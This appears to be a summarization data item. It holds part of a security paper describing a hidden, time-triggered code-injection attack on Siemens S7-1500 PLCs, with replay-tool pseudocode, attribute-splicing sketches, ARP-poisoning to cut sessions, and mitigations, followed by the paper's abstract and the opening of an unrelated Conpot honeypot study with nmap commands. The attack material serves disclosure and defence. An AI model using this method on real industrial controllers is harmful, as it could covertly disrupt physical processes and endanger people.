Our attack approach presented in this paper comprises two main phases: the patching phase (online phase) and the attack phase (offline phase). Please note that getting the IP address, MAC address, and model of the victim PLC is an easy task by running our PN-DCP protocol based scanner presented in [5], or other network scanners that can obtain all the information that the attacker needs to communicate with the target device.
FIG. 10. High-level overview of the patching phase.
A. PATCHING PHASE
Fig. 10 shows a high-level overview of this phase. We aim at injecting the PLC with our malicious instructions programmed in the interrupt block OB10. This phase consists of four steps:
a) Uploading and downloading the user's program.
b) Modifying and updating the control logic program.
c) Crafting the S7CommPlus download message.
d) Pushing the attacker's message to the victim PLC.
To patch the target PLC, we utilize our MITM station, which has two main components:
1) A TIA Portal: to retrieve and modify the current control logic program that the PLC runs.
2) A PLCinjector: to download the attacker's code to the PLC.
In this work, we developed a Python script for this purpose based on the Scapy library (https://scapy.net/). For a realistic scenario, there are two possible cases that an attacker might encounter after accessing the network.
1) CASE_1: INACTIVE S7 SESSION
In this scenario, the legitimate TIA Portal is offline, and only communicates with the PLC if an upload process is required.
Step 1. Uploading & Downloading the User's Program: In this step, we aim at obtaining the decompiled control logic program that the PLC runs, and the S7CommPlus message that the TIA Portal sends to download the original user program into the PLC. To achieve these goals, we first open the attacker's TIA Portal and establish a connection with the victim PLC directly. This is possible due to a security gap in the S7-1500 PLC design. In fact, the PLC does not perform any security check to ensure that the currently communicating TIA Portal is the same TIA Portal that it communicated with in an earlier session. Hence, any external adversary provided with a TIA Portal on his machine can easily communicate with an S7 PLC without any effort.
After successfully establishing the communication, we upload the control logic program into the attacker's TIA Portal. Then we re-download it once again to the PLC, and sniff the entire S7CommPlus message flow exchanged between the attacker's TIA Portal and the victim PLC using the Wireshark software. At the end of this step, the attacker has the program on his TIA Portal, and all the captured download messages saved in a pcap file for future use (explained in step 3).
Step 2. Modifying & Updating the PLC's Program: After retrieving the user program that the target PLC runs, the attacker's TIA Portal displays it in one of the high-level programming languages that it was programmed with (e.g., SCL).
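The filtering that the Step 1 capture performs (done with Wireshark in our setup) can be sketched in plain Python. The sketch below assumes the standard TPKT (4-byte) plus COTP (length-prefixed) framing used on 102/TCP, with the S7 protocol ID byte (0x32 or 0x72, cf. Section III.F) as the first byte of the S7 PDU; the packet tuples are a stand-in for real pcap records, not a Scapy API.

```python
S7_PORT = 102  # ISO-on-TCP port used by the S7 protocols

def s7_flavor(tcp_payload: bytes) -> str:
    """Classify an S7 PDU by its protocol ID byte.

    Assumes TPKT (4 bytes) followed by a COTP header whose first byte is
    its length indicator; the S7 PDU starts right after the COTP header.
    """
    li = tcp_payload[4]                      # COTP length indicator
    proto_id = tcp_payload[4 + 1 + li]       # first byte of the S7 PDU
    return {0x32: "S7comm", 0x72: "S7CommPlus"}.get(proto_id, "unknown")

def s7_payloads(captured):
    """Keep only 102/TCP traffic; records are (sport, dport, payload)."""
    return [p[2] for p in captured if S7_PORT in (p[0], p[1])]
```

In a real capture the payloads would come from a pcap reader; here the point is only the port filter and the protocol-ID dispatch.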
Based on our understanding of the physical process controlled by the PLC, we configure and program our Time-of-Day interrupt block OB10 to force certain outputs of the system to switch off once the interrupt is activated (shown later in Fig. 13). Although our malicious code differs from the original code by only an extra small block (OB10), it is sufficient to confuse the physical process of our experimental set-up.
The easiest way to update the program running in the PLC is to use the attacker's TIA Portal. When we downloaded the modified control logic, the PLC updated its program successfully. But the ICS operator could easily reveal the modification by uploading the program from the infected PLC, and comparing the offline and online programs running on his legitimate TIA Portal and the remote PLC, respectively.
FIG. 11. Closing the online session using MITM Approach.
FIG. 12. Experimental Set-up.
Step 3. Crafting the S7CommPlus Download Message: To hide our infection from the legitimate user, we first recorded the S7CommPlus messages exchanged between the attacker's TIA Portal and the PLC while downloading the modified program. As mentioned earlier in Section IV.B, each download message has objects and attributes (see Fig. 9). The ProgramCycleOB object is dedicated to creating a program cycle block in the PLC's memory and has three different attributes:
a) Object MAC: denoted by the item value ID Block.AdditionalMac.
b) Object Code: denoted by the item value ID FunctionalObject.Code.
c) Source Code: denoted by the item value ID Block.BodyDescription.
The Object Code is the code that the PLC reads and processes, whilst the Source Code is the code that the TIA Portal decompiles, reads, and displays for the user.
FIG. 13. The malicious instructions in OB10.
Therefore, all that is required to show the user the original code is to modify the S7CommPlus message that the attacker sends, by replacing the Source Code attribute of the ProgramCycleOB object of the attacker's program with the Source Code attribute of the ProgramCycleOB object of the original program.
Our investigation showed that the newest model of the SIMATIC PLCs has a serious design vulnerability. The PLC checks the session freshness by running a precautionary measure. Hence, it can detect manipulation and refuses to update its program in case the attributes do not belong to the same session. But surprisingly, this holds true only for the Object MAC and the Object Code attributes. That is, to make the PLC accept the crafted message, our crafted S7CommPlus download message must always have the Object MAC and the Object Code attributes from the same session, whilst the Source Code attribute can be substituted with an attribute from a different session, i.e., from a pre-recorded session. All the captured packets containing the attributes of the ProgramCycleOB for both the user and attacker programs are presented in the Appendix.
Step 4. Pushing the Crafted Message to the PLC: The crafted S7CommPlus download message contains the following attributes: the Object MAC and Object Code attributes of the attacker's program, and the Source Code attribute of the user program. As S7CommPlusV3 exchanges a shared session key between the TIA Portal and the PLC to prevent replay attacks, we first need to bundle the packet with a correct key before we push the crafted message to the PLC. Exploiting the shared key is out of the scope of this paper; it is explained in detail in [30]. Once the malicious key exchange is completed, we can easily bundle the key bytecodes with our crafted message.
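The substitution in Step 3 amounts to a byte splice: keep the attacker's Object MAC and Object Code (which the PLC binds to the session) and paste in the user's Source Code. In the sketch below the attribute boundaries are passed in as explicit offsets for illustration; locating them in a real capture requires walking the S7CommPlus item IDs, which we omit here.

```python
def craft_download(attacker_msg: bytes, user_msg: bytes,
                   atk_src_span: tuple, usr_src_span: tuple) -> bytes:
    """Replace the Source Code attribute bytes of the attacker's message
    with the Source Code attribute bytes of the user's message."""
    a_start, a_end = atk_src_span   # Source Code span in attacker message
    u_start, u_end = usr_src_span   # Source Code span in user message
    return (attacker_msg[:a_start]
            + user_msg[u_start:u_end]
            + attacker_msg[a_end:])
```

Everything outside the spliced span, including the Object MAC and Object Code, stays byte-for-byte the attacker's, which is what lets the crafted message pass the PLC's freshness check.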
Taking into consideration the appropriate modification of the session ID and the integrity fields, we store the final S7 message (the attacker's message) in a pcap file for pushing it back to the PLC as a replay attack. Algorithm 1 describes the main core of our PLCinjector tool, which we use to patch the PLC with the attacker's download message.
The PLCinjector tool has two functions. The first one is utilized to exploit the integrity protection session key that S7CommPlusV3 uses. The session key exchanged in each session between the TIA Portal and S7-1500 PLCs originates from combining 16 bytes of the PLC's ServerSessionChallenge, precisely the ones located between the bytes 2 and 18, with a random 24-byte KDK that the TIA Portal chooses. Afterwards, a fingerprinting function f() is used within the session key calculation. Line 5 generates a 24-byte random quantity (M), and maps it to the elliptic curve's domain, denoted PreKey. From the random point PreKey, we use a Key Derivation Function (KDF) to derive three 16-byte quantities identified as follows: Key Encryption Key (KEK), Checksum Seed (CS), and Checksum Encryption Key (CEK). In line 7, the CS generates 4096 pseudo-random bytes organized as four 256-word tables, namely the LUT. This LUT is used to calculate a checksum over the KDK and PLC_Challenge. Lines 8 to 13 depict the elliptic curve key exchange method, similar to the one that the TIA Portal uses to encrypt the randomly generated PreKey. After that, we mask the elliptic curve calculations with 20 randomly chosen bytes (denoted x in the algorithm). Line 19 provides an authenticated encryption of the encrypted KDK: a non-cryptographic checksum is computed, then encrypted by the AES-ECB function. Finally, we add two header fields including key fingerprints, i.e., 8-byte truncated SHA256 hashes of the relevant key, with some additional flags (see line 20).
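Two building blocks of the mechanism just described can be sketched compactly: the 8-byte key fingerprints (truncated SHA-256 hashes) and the use of the derived session key as the HMAC-SHA256 key for per-fragment protection (Section IV.A). The exact input formatting is defined in [30] and [27]; the sketch below shows only the shapes, with our own function names.

```python
import hashlib
import hmac

def key_fingerprint(key_material: bytes) -> bytes:
    # 8-byte truncated SHA-256 hash, as used for the header key fingerprints
    return hashlib.sha256(key_material).digest()[:8]

def fragment_digest(session_key: bytes, header: bytes, data: bytes) -> bytes:
    # per-fragment HMAC-SHA256 digest, placed between the fragment
    # header and the fragment data in S7CommPlusV3
    return hmac.new(session_key, header + data, hashlib.sha256).digest()
```

A replayed message must carry digests computed under the session key the PLC expects, which is exactly why Function 1 has to reproduce the key derivation before Function 2 can replay the crafted message.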
After establishing a successful session with the victim, the PLC exchanges the maliciously generated Session_Key with the attacker's machine within the current communication session. In the next step, our tool executes Function 2 to send the attacker's crafted S7 message, which contains the malicious code combined with the generated Session_Key. Our attacking tool can also be used against all the S7-1500 PLCs sharing the same firmware. This is due to the fact that Siemens has designed its new S7 key exchange mechanism assuming that all devices running the same firmware version also use the same public-private key pair [30].
After a successful injection, the PLC updates its program, processing the Object Code of the attacker's program while it saves the Source Code of the user's program in its memory. Therefore, whenever the user uploads the program from the infected PLC, the TIA Portal will recall, decompile, and display the original program. This keeps our injection hidden inside the PLC, and the user cannot detect any difference between the online and offline programs.
2) CASE_2: ACTIVE S7 SESSION
In this scenario, there is an ongoing active S7 session between the legitimate TIA Portal and the PLC during the patch. As the S7 PLC, by default, allows only one active online session, an attacker is not able to communicate with the PLC. It will immediately refuse any attempt to establish a connection, as it is already communicating with the user. For such a scenario, the attacker first needs to close the current online session
Algorithm 1: PLCinjector Tool.
Function 1: Get_Session_Key(ServerSessionChallenge)
1: Checksum = 0
2: PLC_Challenge = ServerSessionChallenge[2:18]
3: KDK = prng(24)
4: Session_Key = HMAC-SHA256(f(Challenge, 8))[:24]
5: PreKey = M(prng(24))
6: KEK, CEK, CS = KDF(PreKey)
7: LUT[4][256] = hash-init(CS)
8: while point == ∅ do
9:     x = prng(20)
10:    point = fx(G, y, Nonce)
11:    EG2 = y(point)
12: end while
13: EG1 = add(s, PreKey)
14: for block in E(KDK) do
15:     Checksum = hash(Checksum ⊕ block, LUT[4][256])
16: end for
17: Checksum[12] = Checksum[12] ⊕ 40
18: final_Checksum = hash(Checksum, LUT[4][256])
19: key = AES-ECB(final_Checksum)
20: KEY = SHA256(key[:24] || DERIVE[:8])
21: return KEY
END Function 1
Function 2: Replay(pcapfile, Ethernet_interface, SrcIP, SrcPort)
22: RecvSeqNum = 0
23: SYN = TRUE
24: for pkt in rdpcap(pcapfile) do
25:     IP = pkt[IP]
26:     TCP = pkt[TCP]
27:     delete IP.checksum
28:     IP.src = SrcIP
29:     IP.Port = SrcPort
30:     if TCP.flags == ACK or TCP.flags == RSTACK then
31:         TCP.ack = RecvSeqNum + 1
32:         if sendp(pkt, iface=Ethernet_interface) then
33:             SYN = False
34:             Continue
35:         end if
36:     end if
37:     Recv = srp1(pkt, iface=Ethernet_interface)
38:     RecvSeqNum = Recv[TCP].seq
39: end for
END Function 2
between the legitimate user and the PLC, before patching his malicious code.
A user can establish an online session with an S7 PLC by enabling the go online feature in the TIA Portal software. Then he can control, monitor, diagnose, download, upload, start, and stop the CPU remotely. Once the user has established an online connection with the PLC, the two parties (the TIA Portal and the PLC) regularly exchange a specific message along the session. This message is known as S7-ACK, and is in charge of keeping the session alive. The TIA Portal must always respond to any S7-ACK request sent by the PLC with an S7-ACK reply message.
Therefore, to close the current online session we run our MITM station (presented in [3]), which allows us to intercept and drop all packets sent from the TIA Portal by performing the well-known ARP poisoning approach. If the PLC does not receive a response from the TIA Portal right after sending an acknowledgment request, it will close the connection with the connected TIA Portal, and both go offline. Fig. 11 describes this scenario. It is worth mentioning that an attacker can also use different ways to close the connection, e.g., port stealing, a replay attack with go offline packets, etc.
After both the legitimate TIA Portal and the victim PLC have gone offline, the attacker can easily establish a new session with the PLC using his own TIA Portal. Then he patches the victim device following the same four steps explained in the previous case. For this scenario, our patching approach has limitations. The legitimate TIA Portal was forced to close the session with the PLC. That is, the user can plainly see that he lost the connection with the remote device. In case he attempts to re-connect to the PLC while it is connected to the attacker's TIA Portal, the PLC will refuse his connection request. Our investigations showed that there is no way to re-connect the legitimate TIA Portal to the victim PLC after patching the PLC, unless the ICS operator himself enables go online on his TIA Portal. This abnormal disconnection between the two parties is the only effect of our patch in this scenario.
B. ATTACK PHASE
After a successful injection, the attacker goes offline and closes the current communication session with the target PLC. With the next execution cycle, the attacker's program will be executed in the PLC. That is, the interrupt condition of the malicious interrupt block OB10 will be checked in each execution cycle. This block remains in idle mode, hidden in the PLC's memory, as long as the interrupt condition is not met.
Once the configured date and time of the attack match the date and time of the CPU, the interrupt code is activated, i.e., the execution of the main program (OB1) is suspended, and the CPU jumps to execute all the instructions that the attacker programmed OB10 with. In our application example, we programmed OB10 to force certain motors to turn off at a certain time and date when we are completely disconnected from the target's network.
VI. EVALUATION, DISCUSSION, AND MITIGATION
In this section, we present the implementation of our attack approach, and assess the service disruption of the physical process due to our patch. Afterwards, we discuss our results and suggest possible mitigation methods to protect systems from such a threat.
A. LAB SETUP
For evaluating our attack approach, we used the Fischertechnik training factory shown in Fig. 12. It consists of industrial modules such as storage and retrieval stations, vacuum suction grippers, a high-bay warehouse, a multi-processing station with kiln, a sorting section with color detection, an environment sensor, and a pivoting camera. The entire factory is controlled by a SIMATIC S7-1512SP with firmware V2.9.2, and programmed with TIA Portal V16. The PLC connects to a TXT controller via an IoT gateway. The TXT controller serves as a Message Queuing Telemetry Transport (MQTT) broker and an interface to the fischertechnik cloud.
The factory we used in our experiment provides two industrial processes: storing and ordering materials. The default process cycle begins with storing and identifying the material, i.e., the workpiece. The factory has an integrated NFC tag sensor storing production data that can be read out via an RFID NFC module. This allows the user to trace the workpieces digitally. The cloud displays the part's colour and its ID-number.
Afterwards, the vacuum gripper places suction on the material and transports it to the high-bay warehouse, which applies a first-in first-out principle for the outsourcing. All goods that were stored can be ordered again online using a dashboard. The desired product and the corresponding color are selected by the user, and then placed in the shopping cart. The suction gripper passes the workpiece from one step to the next, and then moves back to the sorting system once the production is complete. The sorting system receives the allocation command as soon as the color sorter detects the proper color. The material is sorted using pneumatic cylinders. Finally, the production data is written to the material at the end of the production process, and the finished product is provided for collection.
B. IMPLEMENTATION
In our experiment, we found that the vacuum suction gripper (VGR) is involved in all the industrial processes that the Fischertechnik system operates. Therefore, if we could disrupt its functionality, the entire system would be impacted. The VGR module moves with the help of 8 mini motors: vertical motor up (%Q2.0), vertical motor down (%Q2.1), horizontal motor backwards (%Q2.2), horizontal motor forwards (%Q2.3), turn motor clockwise (%Q2.4), turn motor anti-clockwise (%Q2.5), compressor (%Q2.6), and valve vacuum (%Q2.7). Therefore, to exploit the VGR, we programmed our OB10 to force all 8 motors to switch off at the zero point of the attack, as shown in Fig. 13.
After patching the PLC with our malicious block, and before the Time-of-Day interrupt was activated, we did not record any physical impact, and the Fischertechnik system kept operating normally. Once the CPU clock matched the attack time that we set, we noticed that the VGR module stopped moving.
Furthermore, the workpiece being transported by the gripper fell down, as the compressor, which provides the appropriate airflow to carry the goods, was turned off. This led to an incorrect operation, and the movement sequence of the workpieces was disrupted. For a real-world heavy factory, e.g., the automobile manufacturing industry, such an attack scenario might be seriously dangerous and even cost human lives.
FIG. 14. Boxplot presenting the measured execution cycle times of OB1.
C. EVALUATION
To accurately assess the impact of our patch on the physical process controlled by the infected device, we measured and analyzed the differences in the execution cycle times of the control logic program that the PLC runs in three different scenarios:
- Normal Operation: before patching the PLC, as a baseline.
- Idle Attack: after patching the PLC and before the interrupt is activated, i.e., the PLC is running the attacker's program.
- Activated Attack: after the interrupt has been executed.
Siemens PLCs, by default, store the time of the last execution cycle in a local variable of OB1 called OB1_PREV_CYCLE. Therefore, we added a small SCL code snippet to our control program which stores the last cycle time in a separate data block. Then we recorded 4096 execution cycle times for each scenario, calculated the arithmetic median value, and used the Kruskal-Wallis and the Dunn's Multiple Comparison tests for statistical analysis. All the results are presented as boxplots in Fig. 14. In order to make our resulting boxplots clearer and easier to read, we define the following parameters:
1) First quartile (Q1): represents the middle value (cycle time) between the smallest value and the median of the total recorded values (4096 execution cycle times).
2) Median (Q2): represents the middle value of the total recorded values.
3) Third quartile (Q3): represents the middle value between the highest value and the median of the total recorded values.
4) Interquartile Range (IQR): represents all the values between 25% and 75% of the total recorded values.
5) Maximum: represents Q3 + 1.5*IQR.
6) Minimum: represents Q1 - 1.5*IQR.
7) Outliers: represents all the values that are higher or lower than the maximum and minimum values, respectively.
Our measurements show that the calculated median value (Q2) of executing OB1 for the infected program is approx. 38 ms, and differs only slightly from the median value of executing OB1 for the original program, which is almost 36 ms. The Q1 and Q3 values for the infected program are as high as 36 ms and 40 ms, respectively. They are a bit higher compared to the recorded ones for the original program, i.e., 35 ms and 37 ms for Q1 and Q3, respectively. That is, checking the interrupt condition of our malicious block in each execution cycle does not disrupt executing the control logic, and the Fischertechnik system keeps operating normally. Please note that executing the attacker's program must not exceed the overall maximum execution time of 150 ms. Our measurements clearly show that our injection did not trigger this timeout, as we recorded a maximum value as high as 47 ms, which is still quite small compared to 150 ms.
Once the CPU's date and time match the date and time that we set to trigger our attack, the CPU jumps to execute the malicious instructions existing in OB10, and the attack is activated. Our measurements for this scenario did not record any higher median values in the execution cycles compared to the prior scenario, i.e., when the attack is idle. This is because we set OB10 to occur only once, so the PLC processes the instructions existing in OB10, and resumes executing OB1 from the last point before the interrupt. But it keeps checking the condition of the interrupt in each cycle as long as OB10 exists in the control logic program.
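The boxplot parameters defined above (Q1-Q3, IQR and the 1.5*IQR whisker bounds) can be reproduced for a recorded series of cycle times with a few lines of Python. This is a generic illustration using the standard library, not the script used in our measurement.

```python
import statistics

def boxplot_params(cycle_times):
    """Q1/Q2/Q3, IQR and the 1.5*IQR whisker bounds for a sample of
    execution cycle times (in milliseconds)."""
    q1, q2, q3 = statistics.quantiles(cycle_times, n=4)
    iqr = q3 - q1
    return {"Q1": q1, "Q2": q2, "Q3": q3, "IQR": iqr,
            "maximum": q3 + 1.5 * iqr, "minimum": q1 - 1.5 * iqr}
```

Values outside [minimum, maximum] are the outliers plotted individually in Fig. 14.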
However, our approach allows attackers to adjust the repetition of the interrupt (see Section III), as well as to program the interrupt block at will, causing different impacts on the physical process of the target system.
D. DISCUSSION
Based on our analysis, we can conclude that when our patch is in idle mode, the execution cycle times of the infected program are almost the same as the execution times of the original program. Therefore, the ICS operator would not record any abnormality in executing the control logic, as the TIA Portal software will not report any differences before and after the patch. Furthermore, our attack approach always shows the original program to the ICS operator, even though the PLC is running a different one. This is due to the fact that the original Source Code attribute is always sent back to the TIA Portal whenever the user requests the program from the infected PLC. For all these reasons, our attack is capable of staying in the device in idle mode for a long time without being revealed, and the only way to remove it is for the ICS operator to re-program the device once again. However, in critical facilities and power plants, re-programming the PLCs is not common unless there is a certain reason to do so.
The success of our attack approach on S7-1500 PLCs is, indeed, based on serious design vulnerabilities in the newest model of S7 PLCs and security issues in the integrity mechanism used in the latest version of the S7CommPlus protocol. We found that the PLC does not authenticate the TIA Portal as we expected, and only confirms the session freshness.
This allows an external attacker to perform replay attacks against the PLC, keeping in mind that he always has to provide the correct Session_Key in his crafted S7 messages; otherwise the PLC will detect that the expected S7 message has been modified and will refuse to update its program. Siemens claimed that the newest PLCs are resilient against replay attacks, but unfortunately we could maliciously update the PLC's program by sending a crafted S7 download message. Another vulnerability we detected during our investigations is that there is no security pairing between the TIA Portal and the PLC, i.e., the PLC does not ensure that the TIA Portal it is currently communicating with is the same TIA Portal as in a previous session. This allows an attacker who has a TIA Portal installed on his machine to easily access the PLC without any effort, although this holds true only as long as the target PLC is not already connected online to the legitimate TIA Portal. Our results showed that an attacker can still communicate with and inject the victim after closing the current session between the TIA Portal and the PLC. It is also noticeable that Siemens provides its 1500 CPUs with a sophisticated integrity checking algorithm which checks the validity of any S7 message received. But unfortunately, this does not hold true for the entire ProgramCycleOB object. That is, the CPU checks only the integrity of the Object MAC and the Object Code, and has no integrity check for the Source Code. So, if an attacker replaces the Source Code with one from another session, the PLC will authenticate the download message and run the attacker's program. This is a significant security gap in the design of the integrity mechanism of S7-1500 PLCs, as it keeps the injection hidden inside the memory.
E. MITIGATION
The fundamental solution would be to completely redesign the integrity check mechanism that the newest S7 PLCs use.
The new mechanism should include security pairing and mutual authentication between the PLC and the TIA Portal. But we are aware of the fact that such a solution would also incur an extremely high cost and may have backward compatibility issues. Furthermore, ICS devices are usually not software-updated on time, and have a very long life-cycle compared to common IT devices. For all that, we should expect that insecure devices will remain deployed in real-world ICS environments for a long time. In this context, network detection can be seamlessly integrated into the existing ICS setting. In particular, control logic detection [36] and verification [41], [42] can be utilized to alleviate the current situation. As our injection was hidden in the PLC memory, partitioning the memory space and enforcing memory access control [37] could also be a reasonable solution. Other suggestions include employing standard cryptographic methods such as digital signatures (for messages like control logic manipulation), but also using network monitoring tools like Snort [38], ArpAlert [39], and ArpWatchNG [40] to reveal any attack involving MITM approaches. Furthermore, a mechanism to check the protocol header, which contains information about the type of the payload, is also recommended as a solution to detect and block any potential unauthorized transfer of the control logic. However, from our perspective, the best solution to prevent injection attacks is to separate the information technology (IT) domain from operational technology (OT) networks by using a Demilitarized Zone (DMZ).
VII. CONCLUSION
This paper presented a new threat to the newest SIMATIC PLCs. Our attack approach is based on injecting the attacker's malicious code once he gains access to the target's network, but activating his patch later without a need to be connected at the time of the attack. Our investigation identified a few design vulnerabilities in the new integrity method that the S7-1500 PLCs use.
Based on our findings, we successfully conducted an injection attack by patching the tested PLC with a Time-of-Day interrupt block (OB10). This block allows us to activate our patch and disrupt the physical process without being connected to the victim at the attack's point zero. We analyzed and evaluated the possibility of the ICS operator revealing our injection. Our experimental results showed that the original control logic program is always shown to the user, whilst the PLC runs the attacker's program. In addition, our injection does not increase the execution times of the control logic; hence the physical process is not impacted while our patch is in idle mode. To summarize, our attack is a very serious threat to ICSs, as attackers need to be online only while patching and can close all connections to the target's network afterwards. Therefore, they will not be detected even if the ICS operators re-activate their security measures. Finally, we provided some recommendations to secure ICSs from such a severe threat. Our attack approach is feasible for all S7-1500 PLCs with firmware 2.9.2 or lower. However, Siemens updated the firmware for all S7-1500 CPUs in December 2021 to the newer version 2.9.4; a further investigation is therefore required to test the security of the latest firmware version. Furthermore, a deeper analysis of the advanced S7CommPlus protocol, aimed at understanding the private-key mechanism that the PLCs implement, can also be part of future work. We believe that if attackers manage to extract the private key from an S7-1500 PLC, then stronger attacks, e.g., full man-in-the-middle, session hijacking, and PLC impersonation attacks, might become possible for the entire product line. APPENDIX. PACKET CAPTURES FIG. 15. Object MAC Attribute - User Program. FIG. 16. Object Code Attribute - User Program. FIG. 17. Source Code Attribute - User Program. FIG. 18.
Object MAC Attribute - Attacker Program. FIG. 19. Object Code Attribute - Attacker Program. FIG. 20. Source Code Attribute - Attacker Program.
Summary:
Programmable Logic Controllers (PLCs) are increasingly connected and integrated into the Industrial Internet of Things (IIoT) for better network connectivity and a more streamlined control process. This, however, also brings security challenges and exposes them to various cyber-attacks targeting the physical process controlled by such devices. In this work, we investigate whether the newest S7 PLCs are vulnerable by design and can be exploited. In contrast to the typical control logic injection attacks in the research literature, which require adversaries to be online throughout the attack, this article introduces a new exploit strategy that aims at disrupting the physical process controlled by the infected PLC while the adversary is connected neither to the target nor to its network at the attack's point zero. Our exploit approach comprises two steps: 1) patching the PLC with a malicious Time-of-Day interrupt block once an attacker gains access to an exposed PLC, and 2) triggering the interrupt at a later time of the attacker's choosing, when he is disconnected from the system's network. For a realistic attack scenario, we implemented our approach on a Fischertechnik training system based on an S7-1500 PLC using the latest version of the S7CommPlus protocol. Our experimental results showed that we could keep the patched interrupt block idle and hidden in the PLC memory for a long time without it being revealed, before being activated at the specific date and time the attacker defined. Finally, we suggest some potential security recommendations to protect industrial environments from such a threat.
|
Summarize:
Keywords Supervisory Control and Data Acquisition systems, honeypots, Conpot, network security I. INTRODUCTION In a world where the value of information is ever increasing, hackers are consistently targeting governments, corporations, and individuals to obtain valuable secrets, proprietary data, and personally identifiable information (PII). Honeypots can be used to better understand the landscape of where these attacks are originating. Honeypots can be leveraged not only to conduct research on threats in the wild, but also to notify an organization if a potential threat is within one's network. Supervisory Control and Data Acquisition (SCADA) systems are a critical target, and with the advent of SCADA honeypots, attempts to access or tamper with SCADA devices can be preemptively identified and analyzed. A. Background SCADA honeypots attempt to mimic an active SCADA system. A typical SCADA system is composed of four parts: a central computer (host), a number of field-based remote measurement and control units known as Remote Terminal Units (RTUs), a wide-area telecommunications system to connect them, and an operator interface to allow the operator to access the system [1]. Conpot is a low-interaction SCADA honeypot and serves the purpose of being extremely easy to implement. Serbanescu et al., for example, found that Conpot would support the simulation of hypertext transfer protocol (HTTP), Modbus (a serial communication protocol), and Simple Network Management Protocol (SNMP; used for network management), and the integration of programmable logic controllers (PLC) [2]. The Conpot project by The Honeynet Project was released in May 2013. Conpot utilizes a logging system to monitor any changes that are made by intruders. The honeypot logs events of HTTP, SNMP and Modbus services with millisecond accuracy and offers basic tracking information such as source address, request type, and resource requested in the case of HTTP [3]. B.
Research Gap In a literature review of SCADA honeypots, a gap was identified regarding the analysis of the effectiveness of the various honeypots. Studies were found that detailed the interactions occurring with a given honeypot, i.e., Digital Bond Honeynet and Conpot; however, studies of the actual effectiveness of any given honeypot have not been conducted. The closest approach to this field of study was carried out by Fronimos et al., whose study focused on evaluating the usability and performance of low-interaction honeypots but did not examine the specifics of SCADA honeypot efficacy [4]. A more detailed look at the efficacy of SCADA honeypots that takes into account their unique requirements has not been conducted prior to this research. This paper performs a detailed evaluation of the Conpot SCADA honeypot. II. EXPERIMENT APPROACH To conduct a full analysis of the SCADA honeypot Conpot, a virtualized image was created and used in multiple Amazon Web Services (AWS) zones. The SCADA honeypots ran from March 25th to April 11th, and the logs were subsequently analyzed. An additional log set was pulled April 27th for further analysis. The following section outlines the setup steps and the process for creating instances of Conpot. Installation of Conpot is quite simple; however, certain dependencies are necessary for it to fully function. Due to the age of some of the required packages, repositories must be manually added. Ubuntu 12.04, an open-source software platform used for various mobile and other devices, was used as the base operating system for a micro-instance within AWS, after configuring basic settings and conducting updates. A. Experiment Setup After successfully obtaining the Conpot start screen, the AWS micro-instance was shut down so that an image could be created. Utilizing the Create Image function within AWS, the image was then added to the Images AMI folder for deployment.
This image was then propagated to additional AWS deployment zones. After deploying the image twice in each zone (see Table I), the SCADA honeypots were booted and accessed via SSH to finalize their deployment. This material is based upon work supported by the U.S. National Science Foundation under Grant No. DUE-1303362 and SES-1314631. 978-1-5090-3865-7/16/$31.00 (c) 2016 IEEE. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11, 2025 at 16:41:48 UTC from IEEE Xplore. Restrictions apply. An advantage of leveraging AWS is its key-management and port-security options. Each Conpot instance was set up to allow all ports to be accessible and to provide an accurate review of port information when running any given honeypot template. Furthermore, the key pair options facilitated maintaining secure access to each instance. After obtaining the private key necessary to create a connection, each instance was generated using the same public key, which allowed access using one private certificate combined with the instance password. After accessing each honeypot, the following command was used to start Conpot with the designated template: sudo conpot --template [template name]. If a template name is not given, the default template is used. For the purposes of the honeypot analysis, an in-depth review of both the Guardian AST gas pump monitoring system and the default Siemens S7-200 ICS was performed, together with a brief analysis of the IPMI - 371 and Kamstrup 382 smart meter SCADA devices. B. AWS Deployment The following table summarizes the deployed Conpot honeypots by their location, IP address, and template details. The honeypots were deployed globally across AWS for future analysis of regional variations in attack frequency and type: TABLE I.
AWS CONPOT DEPLOYMENT ZONE INFORMATION
AWS Location | Name | IP | Details
us-east-1a | Conpot1 | 52.23.225.126 | Default template
us-east-1a | Conpot2 | 54.86.249.160 | Emulation of gas tank level
us-west-2b | Conpot3 | 52.36.62.44 | Default template
us-west-2b | Conpot4 | 52.32.45.32 | Emulation of gas tank level
eu-west-1b | Conpot5 | 52.30.167.154 | Default template
eu-west-1b | Conpot6 | 52.19.95.69 | Emulation of gas tank level
ap-northeast-1c | Conpot7 | 52.192.20.179 | Default template
ap-northeast-1c | Conpot8 | 52.196.47.205 | Emulation of gas tank level
ap-southeast-1b | Conpot9 | 54.254.141.38 | Default template
ap-southeast-1b | Conpot10 | 54.254.140.52 | Emulation of gas tank level
sa-east-1a | Conpot11 | 54.207.96.59 | Default template
sa-east-1a | Conpot12 | 54.232.248.38 | Emulation of gas tank level
III. DATA AND RESULTS A. Nmap Scan Data The security scanner Nmap was utilized to check the open ports after starting Conpot. Nmap was chosen because it is a mature, robust, connection-oriented scanning tool that is widely used and has broad support for many protocols. For an initial comparison, a vanilla installation of Ubuntu was also deployed and scanned to show which ports are open by default. The following Nmap scanning commands were used: nmap -A -v [IP Address]; nmap -A -v -Pn [IP Address]; nmap -A -v -Pn -p- [IP Address]. Nmap was used in a staged approach to show what the different scanning techniques reported as open ports (Tables II and III). The -A flag turns on version detection and other advanced and aggressive features (nmap.org). This scanning technique is intrusive and readily detected due to its aggressive scanning and operating-system (OS) detection, but it provides a good representation of what to expect for identification. Using -Pn suppresses the ping Nmap normally uses to determine whether a host is up. For the purposes of this analysis, the virtual machines were already known to be operational, and in some cases their configurations rejected pings.
The -p- flag was also used to conduct a scan over the entire port range (ports 1-65535). Lastly, the -v flag was also used to increase output verbosity, although it was later deemed unnecessary for identification, since the -A flag already includes version detection.
TABLE II. NMAP SCANNING (UTILIZING FLAGS -v AND -A)
Honeypot Type | Result | Ports Opened by Conpot
Siemens S7-200 | 22, 80 | 80, 102, 161, 502, 623, 47808
Guardian AST | N/A | 10001
IPMI | N/A | 623
Kamstrup Smart Meter | N/A | 1025, 50100
Scanning with the -v and -A flags produced no results from the Guardian AST, IPMI, and Kamstrup smart meter, due to pings being rejected by these SCADA configurations. The revelation of port 22 through a ping scan should lead an attacker to question whether the Siemens S7-200 emulator is a honeypot or an actual SCADA device.
TABLE III. NMAP SCANNING (UTILIZING -v, -A, AND -Pn FLAGS)
Honeypot Type | Result | Ports Opened by Conpot
Siemens S7-200 | 22, 25, 80, 514, 6009, 8443 | 80, 102, 161, 502, 623, 47808
Guardian AST | 22, 25, 514, 6004, 10001 | 10001
IPMI | 22 | 623
